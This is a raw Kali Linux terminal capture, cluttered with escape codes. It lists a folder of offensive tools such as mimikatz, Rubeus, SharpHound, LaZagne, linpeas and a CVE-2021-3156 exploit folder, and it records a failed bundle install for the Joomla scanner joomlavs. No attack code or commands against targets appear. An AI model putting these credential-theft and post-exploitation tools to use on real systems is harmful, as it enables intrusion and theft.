#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[16D#[90m ~/Downloads#[39m#[12D
#[J#[0;1;2mcommand#[0m
#[0mls lsa lsar lsassy lsattr lsblk lsb_release lscpu lsdiff
lsfd lsinitramfs lsipc lsirq lslocks lslogins lsmem lsmod lsmtd
#[Jlsns #[Jlsof #[Jlspci #[Jlspgpot #[Jlspower #[Jlstopo #[Jlstopo-no-
graphics #[Jlsusb #[J
#[3A#[0m#[27m#[24m#[0m
#[6C#[32mls#[39m#[90m ~/Downloads#[39m#[K#[125C[7:51:35]#[0m#[146D#[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[12D#[?1l#>#[?2004l
#[J#[A#[8C
#[J#]2;ls --color=tty##]1;ls##[0m#[01;34mchisel#[0m
#[01;32mfirefox_decrypt.py#[0m #[01;34mLigolo-ng#[0m
#[01;32mLinuxSmartEnumeration.sh#[0m #[01;32mnmap#[0m rubeus.exe
SharpHound.ps1
#[01;34mCVE-2021-3156#[0m #[01;34mjoomlavs#[0m #[01;32mlinpeas.sh#[0m
mimikatz.exe #[01;32mpspy64#[0m #[01;32mSessionGopher.ps1#[0m
#[01;34msubbrute#[0m
#[01;34mfirefox_decrypt#[0m laZagne.py #[01;32mLinuxPrivChecker.sh#[0m
#[01;32mnc64.exe#[0m #[01;34mRPCScan#[0m SharpHound.exe
#[01;34mwindapsearch#[0m
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools##]1;~/Tools##]7;file:///home/kali/Tools#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m911#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:51:36]#[148D#[?1h#=#[?
2004hc##[4mc#[24m##[4mc#[24m#[90md
~/Tools#[39m#[9D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mc89 c99 cacaplay cacaview cadaver
callgrind_control cardos-tool catman cc ccache2john
cd-create-profile cd-fix-profile cd-iccdump cftp3 cg_annotate cg_diff
cg_merge check_forensic cherryd3 cherrytree
chgrp chkdvifont chmem chmod chpasswd
chromeos-tpm-recovery cisco-decrypt clang++-15 clang++-16 cluster
cmedb colcrt colormgr colrm column comm
compress convert count-14 count-15
count-16 cp cpan cracf2john cracklib-check
cracklib-unpacker crackmapexec createdb cron cryptcat
cryptoflex-tool cupsdisable cupsenable cupstestppd curl
cvtsudoers
#[J#[30m#[104m(MORE)#[39m#[49m#[8A#[0m#[27m#[24m#[0m
#[6C#[4mc#[24m#[90md
~/Tools#[39m#[K#[129C[7:51:36]#[0m#[147D##[4mc#[39m#[4md#[24m###[24m#[32mc#[24m#[32
md#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mcd #[Jcd-create-profile #[Jcd-fix-profile #[Jcd-iccdump
#[Jcd-it8 #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m#[90m ~/Tools#[39m#[K#[129C[7:51:36]#[0m#[146D###[32mc#[32md#[32m
#[39m
#[J#[A#[9C####[32mc#[32md#[39m#[39m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mchisel#[0m/ #[J#[01;34mCVE-2021-3156#[0m/
#[J#[01;34mfirefox_decrypt#[0m/ #[J#[01;34mjoomlavs#[0m/
#[J#[01;34mLigolo-ng#[0m/ #[J#[01;34mRPCScan#[0m/
#[J#[01;34msubbrute#[0m/ #[J#[01;34mwindapsearch#[0m/
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[90m~/Tools#[39m#[K#[129C[7:51:36]#[0m#[145D#[39mj#[39m #[39m
#[39m #[39m #[39m #[39m ########[4mj#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mjoomlavs#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4mj#[24m#[K#[135C[7:51:36]#[0m#[144D##[4mj#[4mo#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mjoomlavs#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4mjo#[24m#[K#[134C[7:51:36]#[0m#[143D##[4mo#[4mo#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mjoomlavs#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4mjoo#[24m#[K#[133C[7:51:36]#[0m#[142D##[4mo#[4mm#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mjoomlavs#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4mjoom#[24m#[K#[132C[7:51:36]#[0m#[141D
#[J#[A#[13C##[4mm#[4mlavs#[1m#[4m/#[0m#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mdata#[0m/ #[J#[01;34mlib#[0m/
#[J#[01;34mspec#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4mjoomlavs#[1m#[4m/#[0m#[24m#[K#[127C[7:51:36]#[0m#[136D###[4ms#[24m#[0m#[24m
##[?1l#>#[?2004l
#[J#[A#[17C
#[J#]2;cd joomlavs##]1;cd##[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools/joomlavs##]1;..ools/joomlavs##]7;file:///home/kali/Tools/
joomlavs#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomlavs#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m912#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:51:39]#[148D#[?1h#=#[?
2004hl##[32ml#[39m##[32ml#[39m#[90ms#[39m##[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49
m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mlaudanum ld ldapdelete
lefty lesskey
libsixel-config light-locker line_send_tcp
linguist lion2john
llvm-cvtres-14 llvm-cvtres-15 llvm-cvtres-16
llvm-gsymutil-14 llvm-gsymutil-15
llvm-gsymutil-16 llvm-install-name-tool-14 llvm-install-name-tool-15
llvm-install-name-tool-16 llvm-jitlink-executor-14
llvm-jitlink-executor-15 llvm-jitlink-executor-16 llvm-lto-14
llvm-lto-15 llvm-lto-16
llvm-modextract-14 llvm-modextract-15 llvm-modextract-16
llvm-nm-14 llvm-nm-15
llvm-nm-16 llvm-otool-14 llvm-otool-15
llvm-otool-16 llvm-symbolizer-14
llvm-symbolizer-15 llvm-symbolizer-16 ln
lnstat localectl
locale-gen lofromtemplate login
loginctl lotus2john
lowriter lp lpmove
lp_solve ls
lsblk lspgpot lwp-dump
lwp-request lzegrep
lzless
#[J#[30m#[104m(MORE)#[39m#[49m#[14A#[0m#[27m#[24m#[0m
#[6C#[32ml#[39m#[90ms#[39m#[K#[137C[7:51:39]#[0m#[147D##[32ml#[32ms#[39m
#[J#[0;1;2mcommand#[0m
#[0mls lsa lsar lsassy lsattr lsblk lsb_release lscpu lsdiff
lsfd lsinitramfs lsipc lsirq lslocks lslogins lsmem lsmod lsmtd
#[Jlsns #[Jlsof #[Jlspci #[Jlspgpot #[Jlspower #[Jlstopo #[Jlstopo-no-
graphics #[Jlsusb #[J
#[3A#[0m#[27m#[24m#[0m
#[6C#[32mls#[39m#[K#[137C[7:51:39]#[0m#[146D#[?1l#>#[?2004l
#[J#[A#[8C
#]2;kali@kali:~/Tools/joomlavs##]1;..ools/joomlavs##]7;file:///home/kali/Tools/
joomlavs#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomlavs#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m913#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:51:39]#[148D#[?1h#=#[?
2004hs#sudo gem install bundler && bundle install#[42D#[7ms#[7mu#[7md#[7mo#[7m
#[7mg#[7me#[7mm#[7m #[7mi#[7mn#[7ms#[7mt#[7ma#[7ml#[7ml#[7m
#[7mb#[7mu#[7mn#[7md#[7ml#[7me#[7mr#[7m #[7m&#[7m&#[7m
#[7mb#[7mu#[7mn#[7md#[7ml#[7me#[7m
#[7mi#[7mn#[7ms#[7mt#[7ma#[7ml#[7ml#[27m#[42D#[27ms#[27mu#[27md#[27mo#[27m
#[27mg#[27me#[27mm#[27m #[27mi#[27mn#[27ms#[27mt#[27ma#[27ml#[27ml#[27m
#[27mb#[27mu#[27mn#[27md#[27ml#[27me#[27mr#[27m #[27m&#[27m&#[27m
#[27mb#[27mu#[27mn#[27md#[27ml#[27me#[27m
#[27mi#[27mn#[27ms#[27mt#[27ma#[27ml#[27ml#[42D#[4m#[32ms#[4m#[32mu#[4m#[32md#[4m#[
32mo#[24m#[39m
#[32mg#[32me#[32mm#[39m#[20C#[32mb#[32mu#[32mn#[32md#[32ml#[32me#[39m#[8C#[?1l#>#[?
2004l
#[J#[A#[48C
#]2;sudo gem install bundler && bundle install##]1;gem#[sudo] password for kali:
Fetching bundler-2.5.9.gem
Successfully installed bundler-2.5.9
Parsing documentation for bundler-2.5.9
Installing ri documentation for bundler-2.5.9
Done installing documentation for bundler after 0 seconds
1 gem installed
Bundler 2.5.9 is running, but your lockfile was generated with 1.16.2. Installing
Bundler 1.16.2 and restarting using that version.
Fetching gem metadata from https://rubygems.org/.
#[32mFetching bundler 1.16.2#[0m
#[33mThere was an error installing the locked bundler version (1.16.2), rerun with
the `--verbose` flag for more details. Going on using bundler 2.5.9.#[0m
Fetching gem metadata from https://rubygems.org/...........
#[32mFetching colorize 0.8.1#[0m
#[32mFetching json 2.1.0#[0m
#[32mFetching docile 1.1.5#[0m
#[32mFetching simplecov-html 0.10.2#[0m
#[32mFetching tins 1.16.3#[0m
#[32mFetching thor 0.19.4#[0m
#[32mFetching diff-lcs 1.3#[0m
#[32mFetching ffi 1.9.18#[0m
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
#[0m#[31mAn error occurred while installing colorize (0.8.1), and Bundler cannot
continue.#[0m
In Gemfile:
colorize
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
#[0m#[31mAn error occurred while installing json (2.1.0), and Bundler cannot
continue.#[0m
In Gemfile:
coveralls was resolved to 0.8.21, which depends on
simplecov was resolved to 0.14.1, which depends on
json
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
#[0m#[31mAn error occurred while installing docile (1.1.5), and Bundler cannot
continue.#[0m
In Gemfile:
coveralls was resolved to 0.8.21, which depends on
simplecov was resolved to 0.14.1, which depends on
docile
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
In Gemfile:
coveralls was resolved to 0.8.21, which depends on
simplecov was resolved to 0.14.1, which depends on
simplecov-html
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
#[0m#[31mAn error occurred while installing thor (0.19.4), and Bundler cannot
continue.#[0m
In Gemfile:
coveralls was resolved to 0.8.21, which depends on
thor
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
#[0m#[31mAn error occurred while installing diff-lcs (1.3), and Bundler cannot
continue.#[0m
In Gemfile:
rspec was resolved to 3.7.0, which depends on
rspec-expectations was resolved to 3.7.0, which depends on
diff-lcs
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
#[0m#[31mAn error occurred while installing ffi (1.9.18), and Bundler cannot
continue.#[0m
In Gemfile:
typhoeus was resolved to 1.3.0, which depends on
ethon was resolved to 0.10.1, which depends on
ffi#[0m
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools/joomlavs##]1;..ools/joomlavs##]7;file:///home/kali/Tools/
joomlavs#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomlavs#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m914#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:51:59]#[148D#[?1h#=#[?
2004hs##[4ms#[24m##[4ms#[24m#[90mudo gem install bundler && bundle
install#[39m#[41D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0msakis3g samba_downgrade_db samba-log-parser samba-regedit
samba-tool scanimage scriptlive
sdiff sed see select-default-
wordlist sensortag seq setleds
setmetamode setpriv sha1sum sha256deep
sha384sum shasum shodan
showconsolefont showkey SIPdump slattach
sleep smbcquotas smbd
smbtar snmpbulkwalk snmpgetnext snmpkey
snmpnetstat snmpstatus snmptest
snmpwalk software-properties-qt spa-json-dump speech-dispatcher
spiderfoot spiderfoot-cli splitfont
sqlite3 ssh ssh-add sshd
ssh-keygen ssh-keyscan sslh
sslscan sspr2john startplasma-wayland stl2gts
sudoedit sum sumtool
sunrpcfuzz svlc svn svnauthz
svnbench svnsync swapoff
switch_root sync systemd systemd-cgls
systemd-confext systemd-escape systemd-stdio-bridge
#[J#[30m#[104m(MORE)#[39m#[49m#[12A#[0m#[27m#[24m#[0m
#[6C#[4ms#[24m#[90mudo gem install bundler && bundle
install#[39m#[K#[97C[7:51:59]#[0m#[147D##[4ms#[39m#[4mu#[24m###[24m#[32ms#[24m#[32m
u#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msu #[Jsudo #[Jsudo-command-line #[Jsudoedit #[Jsudo_logsrvd
#[Jsudoreplay #[Jsudo_sendlog #[Jsulogin #[Jsum #[Jsumtool #[Jsunrpcfuzz
#[Jsuperiotool #[Jsuspend #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msu#[39m#[90mdo gem install bundler && bundle
install#[39m#[K#[97C[7:51:59]#[0m#[146D###[32ms#[32mu#[32md#[39m####[1m#[31ms#[1m#[
31mu#[1m#[31md#[0m#[39m##[1m#[31md#[1m#[31mo#[0m#[39m#####[0m#[4m#[32ms#[0m#[4m#[32
mu#[0m#[4m#[32md#[0m#[4m#[32mo#[24m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msudo #[Jsudo-command-line #[Jsudoedit
#[Jsudo_logsrvd #[Jsudoreplay #[Jsudo_sendlog
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m#[90m gem install bundler && bundle
install#[39m#[K#[97C[7:51:59]#[0m#[144D##[4m#[32mo#[4m#[32m #[24m#[39m
#[J#[A#[11C###[4m#[32mo#[24m#[39m#[24m#[39m
#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mexternal command#[0m
#[0mairmon-ng ant atk6-fake_router26 cd-fix-
profile chromeos-tpm-recovery cluster comm
ebtables-save find-debuginfo fsck.vfat gcc-nm
gpic gxl2dot htmove
impacket-keylistattack impacket-sniff kismet kwalletmanager5
mcafee_epo2john nfsstat oLschema2ldif
orca pfc phar8.2 pipal
pw-mididump r2pm redsocks
sed see seq smbd
snmpgetnext tsk_loaddb uclampset
unshare urlscan valgrind-listener vcstime
x86_64-linux-gnu-ld xfwm4 x-window-manager
#[J#[30m#[104m(MORE)#[39m#[49m#[8A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[90mgem install bundler && bundle
install#[39m#[K#[97C[7:51:59]#[0m#[143D#[39ma#[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[36D##[1m#[31ma#[0m#[39m#[90mpt-get install --yes gvm
openvas#[39m#[32D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mexternal command#[0m
#[0ma2dissite aa-exec ab acyclic
add-apt-repository afm2tfm agentxtrap
airbase-ng airdecloak-ng airmon-ng airserv-ng
airtun-ng aix2john androidfde2john
ansible2john ant apache2 apache2ctl
apachectl apparmor_status applygnupgdefaults
apt apt-add-repository apt-file apt-key
ar aria_read_log arj
ark arp arping arp-scan
arptables-nft-save as asn1tools
astraceroute atk6-connect6 atk6-covert_send6d atk6-
dnssecwalk atk6-dos-new-ip6 atk6-dump_dhcp6 atk6-dump_router6
atk6-extract_hosts6 atk6-fake_advertise6 atk6-fake_dnsupdate6 atk6-fake_mld6
atk6-fake_router26 atk6-flood_mld26 atk6-flood_mldrouter6
atk6-four2six atk6-fragrouter6 atk6-fuzz_ip6 atk6-
implementation6d atk6-inverse_lookup6 atk6-node_query6 atk6-parasite6
atk6-passive_discovery6 atk6-randicmp6 atk6-sendpeesmp6 atk6-thcsyn6
atk6-toobigsniff6 atk6-trace6 atmail2john
atobm automat-visualize3 autopsy autosp
awinreg awk axcrypt2john
#[J#[30m#[104m(MORE)#[39m#[49m#[12A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31ma#[0m#[39m#[90mpt-get install --yes gvm
openvas#[39m#[K#[101C[7:51:59]#[0m#[142D##[1m#[31ma#[1m#[31mp#[0m#[39m
#[J#[0;1;2mexternal command#[0m
#[0mapache2 apache2ctl apachectl apex2john apparmor_parser
apparmor_status applenotes2john applygnupgdefaults appres
appstreamcli apropos apt apt-add-repository apt-cache
apt-cdrom apt-config apt-extracttemplates apt-file
#[Japt-ftparchive #[Japt-get #[Japt-key #[Japt-mark #[Japt-
sortpkgs #[Japython #[J
#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31map#[0m#[39m#[90mt-get install --yes gvm
openvas#[39m#[K#[101C[7:51:59]#[0m#[141D##[1m#[31mp#[1m#[31mt#[0m#[39m####[0m#[32ma
#[0m#[32mp#[0m#[32mt#[39m
#[J#[0;1;2mexternal command#[0m
#[J#[0mapt #[Japt-add-repository #[Japt-cache #[Japt-cdrom #[Japt-config
#[Japt-extracttemplates #[Japt-file #[Japt-ftparchive #[Japt-get #[Japt-key
#[Japt-mark #[Japt-sortpkgs #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mapt#[39m#[90m-get install --yes gvm
openvas#[39m#[K#[101C[7:51:59]#[0m#[140D##[32mt#[32m-
#[39m#####[1m#[31ma#[1m#[31mp#[1m#[31mt#[1m#[31m-#[0m#[39m
#[J#[0;1;2mexternal command#[0m
#[J#[0mapt-add-repository #[Japt-cache #[Japt-cdrom #[Japt-config #[Japt-
extracttemplates #[Japt-file #[Japt-ftparchive #[Japt-get #[Japt-key #[Japt-
mark #[Japt-sortpkgs #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mapt-#[0m#[39m#[90mget install --yes gvm
openvas#[39m#[K#[101C[7:51:59]#[0m#[139D##[1m#[31m-#[1m#[31mg#[0m#[39m
#[J#[0;1;2mexternal command#[0m
#[J#[0mapt-get#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mapt-g#[0m#[39m#[90met install --yes gvm
openvas#[39m#[K#[101C[7:51:59]#[0m#[138D##[1m#[31mg#[1m#[31me#[0m#[39m
#[J#[0;1;2mexternal command#[0m
#[J#[0mapt-get#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mapt-ge#[0m#[39m#[90mt install --yes gvm
openvas#[39m#[K#[101C[7:51:59]#[0m#[137D##[1m#[31me#[1m#[31mt#[0m#[39m########[0m#[
32ma#[0m#[32mp#[0m#[32mt#[0m#[32m-#[0m#[32mg#[0m#[32me#[0m#[32mt#[39m
#[J#[0;1;2mexternal command#[0m
#[J#[0mapt-get#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mapt-get#[39m#[90m install --yes gvm
openvas#[39m#[K#[101C[7:51:59]#[0m#[136D#[39m
#[39mi#[39mn#[39ms#[39mt#[39ma#[39ml#[39ml#[39m #[39m-#[39m-#[39my#[39me#[39ms#[39m
#[39mg#[39mv#[39mm#[39m #[39mo#[39mp#[39me#[39mn#[39mv#[39ma#[39ms#######
########[90mopenvas#[39m########### #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[11D#[90mgvm openvas#[39m#[11D#[39mr#[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[10Duby#[?1l#>#[?2004l
#[J#[A#[37C
#]2;kali@kali:~/Tools/joomlavs##]1;..ools/joomlavs##]7;file:///home/kali/Tools/
joomlavs#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomlavs#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m915#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:52:10]#[148D#[?1h#=#[?
2004hs#sudo gem install bundler && bundle install#[42D#[7ms#[7mu#[7md#[7mo#[7m
#[7mg#[7me#[7mm#[7m #[7mi#[7mn#[7ms#[7mt#[7ma#[7ml#[7ml#[7m
#[7mb#[7mu#[7mn#[7md#[7ml#[7me#[7mr#[7m #[7m&#[7m&#[7m
#[7mb#[7mu#[7mn#[7md#[7ml#[7me#[7m
#[7mi#[7mn#[7ms#[7mt#[7ma#[7ml#[7ml#[27m#[42D#[27ms#[27mu#[27md#[27mo#[27m
#[27mg#[27me#[27mm#[27m #[27mi#[27mn#[27ms#[27mt#[27ma#[27ml#[27ml#[27m
#[27mb#[27mu#[27mn#[27md#[27ml#[27me#[27mr#[27m #[27m&#[27m&#[27m
#[27mb#[27mu#[27mn#[27md#[27ml#[27me#[27m
#[27mi#[27mn#[27ms#[27mt#[27ma#[27ml#[27ml#[42D#[4m#[32ms#[4m#[32mu#[4m#[32md#[4m#[
32mo#[24m#[39m
